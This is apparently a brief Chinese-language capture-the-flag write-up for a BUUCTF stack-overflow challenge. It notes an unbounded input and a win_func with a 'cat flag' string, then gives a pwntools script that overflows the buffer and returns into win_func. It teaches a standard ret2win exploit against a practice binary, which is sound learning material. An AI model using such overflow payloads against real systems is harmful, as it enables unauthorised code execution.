首先查看一下文件的保护措施
在用ida打开看一下
这里的s在进行输入的时候可以输入没有长度限制的字符串,很明显存在栈溢出
然后观察一下函数的列表,存在一个win_func的函数
这里明显直接可以进行系统调用,直接传入命令即可
当然这里也有system函数可以直接使用
在打开字符串窗口,有 cat flag
直接就可以获得flag
点击查看代码
from pwn import *
io=remote("node5.buuoj.cn",27082)
cat_flag=0x080487E0
system=0x08048440
win_func=0x080485BD
payload=b"A"*(0x13+4)+p32(win_func)+p32(0x08048677)+p32(cat_flag)
io.sendline(payload)
io.interactive()